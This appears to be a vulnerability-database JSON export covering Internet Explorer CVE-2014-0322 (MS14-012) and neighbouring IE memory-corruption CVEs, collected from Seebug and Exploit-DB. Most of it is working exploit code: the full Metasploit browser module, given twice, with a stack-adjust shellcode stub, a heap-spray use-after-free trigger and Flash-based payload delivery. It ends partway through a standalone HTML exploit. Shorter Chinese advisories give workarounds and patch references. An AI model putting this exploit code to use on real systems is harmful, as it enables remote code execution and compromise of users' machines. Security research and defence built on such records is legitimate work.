Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n &#39;Name&#39; =&#62; &#34;MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free&#34;,\r\n &#39;Description&#39; =&#62; %q{\r\n This module exploits an use after free condition on Internet Explorer as used in the wild\r\n on the &#34;Operation SnowMan&#34; in February 2014. The module uses Flash Player 12 in order to\r\n bypass ASLR and finally DEP.\r\n },\r\n &#39;License&#39; =&#62; MSF_LICENSE,\r\n &#39;Author&#39; =&#62;\r\n [\r\n &#39;Unknown&#39;, # Vulnerability discovery and Exploit in the wild\r\n &#39;Jean-Jamil Khalife&#39;, # Exploit\r\n &#39;juan vazquez&#39; # Metasploit module\r\n ],\r\n &#39;References&#39; =&#62;\r\n [\r\n [ &#39;CVE&#39;, &#39;2014-0322&#39; ],\r\n [ &#39;MSB&#39;, &#39;MS14-012&#39; ],\r\n [ &#39;BID&#39;, &#39;65551&#39; ],\r\n [ &#39;URL&#39;, &#39;http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html&#39;],\r\n [ &#39;URL&#39;, &#39;http://hdwsec.fr/blog/CVE-2014-0322.html&#39; ]\r\n ],\r\n &#39;Platform&#39; =&#62; &#39;win&#39;,\r\n &#39;Arch&#39; =&#62; ARCH_X86,\r\n &#39;Payload&#39; =&#62;\r\n {\r\n &#39;Space&#39; =&#62; 960,\r\n &#39;DisableNops&#39; =&#62; true,\r\n &#39;PrependEncoder&#39; =&#62; stack_adjust\r\n },\r\n &#39;BrowserRequirements&#39; =&#62;\r\n {\r\n :source =&#62; /script|headers/i,\r\n :os_name =&#62; Msf::OperatingSystems::WINDOWS,\r\n :os_flavor =&#62; Msf::OperatingSystems::WindowsVersions::SEVEN,\r\n :ua_name =&#62; Msf::HttpClients::IE,\r\n :ua_ver =&#62; &#39;10.0&#39;,\r\n :mshtml_build =&#62; lambda { |ver| ver.to_i &#60; 16843 },\r\n :flash =&#62; /^12\\./\r\n },\r\n &#39;DefaultOptions&#39; =&#62;\r\n {\r\n &#39;InitialAutoRunScript&#39; =&#62; &#39;migrate -f&#39;,\r\n &#39;Retries&#39; =&#62; false\r\n },\r\n &#39;Targets&#39; =&#62;\r\n [\r\n [ &#39;Windows 7 SP1 / IE 10 / FP 12&#39;, { } ],\r\n ],\r\n &#39;Privileged&#39; =&#62; false,\r\n &#39;DisclosureDate&#39; =&#62; &#34;Feb 13 2014&#34;,\r\n &#39;DefaultTarget&#39; =&#62; 0))\r\n\r\n end\r\n\r\n def stack_adjust\r\n adjust = &#34;\\x64\\xa1\\x18\\x00\\x00\\x00&#34; # mov eax, fs:[0x18 # get teb\r\n adjust &#60;&#60; &#34;\\x83\\xC0\\x08&#34; # add eax, byte 8 # get pointer to stacklimit\r\n adjust &#60;&#60; &#34;\\x8b\\x20&#34; # mov esp, [eax] # put esp at stacklimit\r\n adjust &#60;&#60; &#34;\\x81\\xC4\\x30\\xF8\\xFF\\xFF&#34; # add esp, -2000 # plus a little offset\r\n\r\n adjust\r\n end\r\n\r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, &#34;exploits&#34;, &#34;CVE-2014-0322&#34;, &#34;AsXploit.swf&#34; )\r\n fd = ::File.open( path, &#34;rb&#34; )\r\n swf = fd.read(fd.stat.size)\r\n fd.close\r\n return swf\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(&#34;Request: #{request.uri}&#34;)\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status(&#34;Sending SWF...&#34;)\r\n send_response(cli, @swf, {&#39;Content-Type&#39;=&#62;&#39;application/x-shockwave-flash&#39;, &#39;Pragma&#39; =&#62; &#39;no-cache&#39;})\r\n return\r\n end\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(&#34;Sending HTML...&#34;)\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n flash_payload = &#34;&#34;\r\n get_payload(cli,target_info).unpack(&#34;V*&#34;).each do |i|\r\n flash_payload &#60;&#60; &#34;0x#{i.to_s(16)},&#34;\r\n end\r\n flash_payload.gsub!(/,$/, &#34;&#34;)\r\n\r\n html_template = %Q|\r\n &#60;html&#62;\r\n &#60;head&#62;\r\n &#60;/head&#62;\r\n &#60;body&#62;\r\n\r\n &#60;script&#62;\r\n\r\n var g_arr = [];\r\n var arrLen = 0x250;\r\n\r\n function dword2data(dword)\r\n {\r\n var d = Number(dword).toString(16);\r\n while (d.length &#60; 8)\r\n d = &#39;0&#39; + d;\r\n\r\n return unescape(&#39;%u&#39; + d.substr(4, 8) + &#39;%u&#39; + d.substr(0, 4));\r\n }\r\n\r\n function eXpl()\r\n {\r\n var a=0;\r\n\r\n for (a=0; a &#60; arrLen; a++) {\r\n g_arr[a] = document.createElement(&#39;div&#39;);\r\n }\r\n\r\n var b = dword2data(0x19fffff3);\r\n\r\n while (b.length &#60; 0x360) {\r\n if (b.length == (0x98 / 2))\r\n {\r\n b += dword2data(0x1a000010);\r\n }\r\n else if (b.length == (0x94 / 2))\r\n {\r\n b += dword2data(0x1a111111);\r\n }\r\n else if (b.length == (0x15c / 2))\r\n {\r\n b += dword2data(0x42424242);\r\n }\r\n else\r\n {\r\n b += dword2data(0x19fffff3);\r\n }\r\n }\r\n\r\n var d = b.substring(0, ( 0x340 - 2 )/2);\r\n\r\n try{\r\n this.outerHTML=this.outerHTML\r\n } catch(e){\r\n\r\n }\r\n\r\n CollectGarbage();\r\n\r\n for (a=0; a &#60; arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n }\r\n\r\n function trigger()\r\n {\r\n var a = document.getElementsByTagName(&#34;script&#34;);\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement(&#39;SELECT&#39;);\r\n c = b.appendChild(c);\r\n }\r\n\r\n &#60;/script&#62;\r\n &#60;embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars=&#34;version=&#60;%=flash_payload%&#62;&#34; width=&#34;10&#34; height=&#34;10&#34;&#62;\r\n &#60;/embed&#62;\r\n &#60;/body&#62;\r\n &#60;/html&#62;\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\nend\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86169"}, {"lastseen": "2017-11-19T17:30:39", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 66026\r\nCVE(CAN) ID: CVE-2014-0299\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer \u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c&quot;MSHTML Shim Workaround&quot;\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "modified": "2014-03-12T00:00:00", "published": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61753", "id": "SSV:61753", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0299)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:59", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 66027\r\nCVE(CAN) ID: CVE-2014-0302\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer \u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c&quot;MSHTML Shim Workaround&quot;\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "modified": "2014-03-12T00:00:00", "published": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61755", "id": "SSV:61755", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0302)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:40", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 66028\r\nCVE(CAN) ID: CVE-2014-0303\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer \u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c&quot;MSHTML Shim Workaround&quot;\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "modified": "2014-03-12T00:00:00", "published": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61756", "id": "SSV:61756", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0303)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:39", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 66025\r\nCVE(CAN) ID: CVE-2014-0298\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer \u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c&quot;MSHTML Shim Workaround&quot;\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "modified": "2014-03-12T00:00:00", "published": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61754", "id": "SSV:61754", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0298)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:46", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 66023\r\nCVE(CAN) ID: CVE-2014-0297\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer \u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c&quot;MSHTML Shim Workaround&quot;\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "modified": "2014-03-12T00:00:00", "published": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61751", "id": "SSV:61751", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0297)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2016-02-03T18:03:34", "bulletinFamily": "exploit", "description": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free. CVE-2014-0322. Remote exploit for windows platform", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "id": "EDB-ID:32904", "href": "https://www.exploit-db.com/exploits/32904/", "type": "exploitdb", "title": "Microsoft Internet Explorer - CMarkup Use-After-Free MS14-012", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Internet Explorer as used in the wild\r\n on the \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\r\n bypass ASLR and finally DEP.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and Exploit in the wild\r\n 'Jean-Jamil Khalife', # Exploit\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-0322' ],\r\n [ 'MSB', 'MS14-012' ],\r\n [ 'BID', '65551' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'],\r\n [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 960,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => stack_adjust\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN,\r\n :ua_name => Msf::HttpClients::IE,\r\n :ua_ver => '10.0',\r\n :mshtml_build => lambda { |ver| ver.to_i < 16843 },\r\n :flash => /^12\\./\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'Retries' => false\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows 7 SP1 / IE 10 / FP 12', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Feb 13 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def stack_adjust\r\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n\r\n adjust\r\n end\r\n\r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0322\", \"AsXploit.swf\" )\r\n fd = ::File.open( path, \"rb\" )\r\n swf = fd.read(fd.stat.size)\r\n fd.close\r\n return swf\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status(\"Sending SWF...\")\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n flash_payload = \"\"\r\n get_payload(cli,target_info).unpack(\"V*\").each do |i|\r\n flash_payload << \"0x#{i.to_s(16)},\"\r\n end\r\n flash_payload.gsub!(/,$/, \"\")\r\n\r\n html_template = %Q|\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n\r\n <script>\r\n\r\n var g_arr = [];\r\n var arrLen = 0x250;\r\n\r\n function dword2data(dword)\r\n {\r\n var d = Number(dword).toString(16);\r\n while (d.length < 8)\r\n d = '0' + d;\r\n\r\n return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n }\r\n\r\n function eXpl()\r\n {\r\n var a=0;\r\n\r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n\r\n var b = dword2data(0x19fffff3);\r\n\r\n while (b.length < 0x360) {\r\n if (b.length == (0x98 / 2))\r\n {\r\n b += dword2data(0x1a000010);\r\n }\r\n else if (b.length == (0x94 / 2))\r\n {\r\n b += dword2data(0x1a111111);\r\n }\r\n else if (b.length == (0x15c / 2))\r\n {\r\n b += dword2data(0x42424242);\r\n }\r\n else\r\n {\r\n b += dword2data(0x19fffff3);\r\n }\r\n }\r\n\r\n var d = b.substring(0, ( 0x340 - 2 )/2);\r\n\r\n try{\r\n this.outerHTML=this.outerHTML\r\n } catch(e){\r\n\r\n }\r\n\r\n CollectGarbage();\r\n\r\n for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n }\r\n\r\n function trigger()\r\n {\r\n var a = document.getElementsByTagName(\"script\");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n }\r\n\r\n </script>\r\n <embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars=\"version=<%=flash_payload%>\" width=\"10\" height=\"10\">\r\n </embed>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/32904/"}, {"lastseen": "2016-02-03T17:56:47", "bulletinFamily": "exploit", "description": "Microsoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012). CVE-2014-0322. Remote exploit for windows platform", "modified": "2014-04-14T00:00:00", "published": "2014-04-14T00:00:00", "id": "EDB-ID:32851", "href": "https://www.exploit-db.com/exploits/32851/", "type": "exploitdb", "title": "Microsoft Internet Explorer 10 - CMarkup Use-After-Free MS14-012", "sourceData": "<!--\r\n MS14-012 Internet Explorer CMarkup Use-After-Free\r\n Vendor Homepage: http://www.microsoft.com\r\n Version: IE 10\r\n Date: 2014-03-31 \r\n Exploit Author: Jean-Jamil Khalife\r\n Tested on: Windows 7 SP1 x64 (fr, en)\r\n Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)\r\n Home: http://www.hdwsec.fr\r\n Blog : http://www.hdwsec.fr/blog/\r\n MS14-012 / CVE-2014-0322\r\n\r\n Generation:\r\n \tc:\\mxmlc\\bin>mxmlc.exe AsXploit.as -o AsXploit.swf\r\n\r\n Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as\r\n\r\n-->\r\n\r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n\r\n<script>\r\n\r\nvar g_arr = [];\r\nvar arrLen = 0x250;\r\n\r\nfunction dword2data(dword)\r\n{\r\n\tvar d = Number(dword).toString(16);\r\n\twhile (d.length < 8)\r\n\t\td = '0' + d;\r\n\r\n\treturn unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n}\r\n\r\nfunction eXpl()\r\n{\r\n var a=0;\r\n\r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n\t\r\n\t// Build a new object\r\n\tvar b = dword2data(0x19fffff3);\r\n while (b.length < 0x360)\r\n\t{\r\n\t\t// mov eax,dword ptr [esi+98h]\r\n\t\t// ...\r\n\t\t// mov eax,dword ptr [eax+8]\r\n\t\t// and dword ptr [eax+2F0h],0FFFFFFBFh\r\n\t\tif (b.length == (0x98 / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x1a000010);\r\n\t\t}\r\n\t\t// mov ecx,dword ptr [edx+94h]\r\n\t\t// mov eax,dword ptr [ecx+0Ch]\r\n\t\telse if (b.length == (0x94 / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x1a111111);\r\n\t\t}\r\n\t\t// mov eax,dword ptr [edx+15Ch]\r\n\t\t// mov ecx,dword ptr 